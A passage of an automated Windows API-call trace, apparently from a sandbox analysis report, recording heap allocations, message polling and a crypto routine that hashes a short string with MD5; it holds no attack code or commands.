lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0249.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0249.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0249.376] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0249.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e563c8 [0249.376] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e561a8 | out: hHeap=0x970000) returned 1 [0249.376] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0249.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0249.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0249.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0249.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a28 [0249.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0249.376] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0249.376] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0249.376] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a28 | out: hHeap=0x970000) returned 1 [0249.376] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0249.376] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0249.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0249.376] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0249.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55f10 [0249.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0249.376] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0249.376] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55f10 | out: hHeap=0x970000) returned 1 [0249.376] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0249.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0249.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54da8 [0249.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0249.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0249.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0249.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0249.377] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0249.377] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0249.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e515b0 [0249.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541e8 [0249.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0249.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0249.377] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0249.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54418 [0249.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0249.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0249.377] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0249.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0249.377] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0249.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0249.378] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0249.378] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0249.378] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0249.378] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0249.378] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55dc0 [0249.378] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0249.378] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0249.378] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0249.378] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0249.378] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0249.378] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0249.378] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0249.379] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0249.379] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0249.379] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0249.379] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0249.379] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0249.379] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0249.379] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0249.379] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0249.379] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55b20 [0249.379] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0249.379] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0249.379] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0249.379] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0249.379] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0249.379] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0249.379] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0249.379] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0249.379] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54418 [0249.379] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0249.379] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0249.380] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0249.380] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0249.380] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0249.380] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0249.380] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0249.380] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0249.380] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0249.380] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0249.380] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0249.380] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0249.380] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0249.380] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544b8 [0249.380] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0249.380] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0249.380] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0249.380] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0249.381] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0249.381] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0249.381] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0249.381] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0249.381] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0249.381] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0249.381] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544e0 [0249.381] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0249.381] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0249.381] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0249.381] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0249.381] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0249.381] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0249.381] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0249.381] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0249.381] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516b8 [0249.381] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0249.381] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54508 [0249.381] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51670 [0249.381] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0249.382] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51868 [0249.382] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516d0 [0249.382] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0249.382] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54530 [0249.382] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0249.382] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0249.382] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0249.382] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0249.382] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55b20 [0249.382] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0249.382] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0249.382] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0249.382] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0249.382] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0249.383] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0249.383] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0249.383] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55c70 [0249.383] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0249.383] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0249.383] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0249.383] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0249.383] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0249.383] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0249.383] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0249.383] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0249.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e775c8 [0249.384] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0249.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0249.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0249.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0249.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0249.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55d50 [0249.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0249.384] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0249.384] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0249.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0249.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0249.384] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0249.384] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0249.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0249.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0249.384] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0249.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51838 [0249.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0249.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0249.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51700 [0249.385] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0249.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51838 [0249.385] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2e51838, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0249.385] CryptCreateHash (in: hProv=0xa5f958, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0249.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e561a8 [0249.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0249.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0249.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51898 [0249.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518b0 [0249.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51838 [0249.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0249.385] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0249.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0249.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0249.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0249.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a28 [0249.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0249.386] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0249.386] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0249.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0249.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0249.386] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0249.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0249.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0249.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0249.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0249.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0249.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0249.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699c8 [0249.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0249.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0249.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0249.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0249.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0249.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54f08 [0249.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0249.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0249.386] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0249.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0249.386] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e54df8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0249.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0249.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0249.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0249.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0249.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0249.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0249.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0249.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0249.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0249.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0249.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0249.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0249.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0249.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0249.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0249.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0249.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0249.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0249.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0249.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699c8 | out: hHeap=0x970000) returned 1 [0249.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0249.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0249.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699a8 [0249.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0249.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0249.388] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0249.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977bd8 [0249.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0249.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0249.388] RtlAllocateHeap 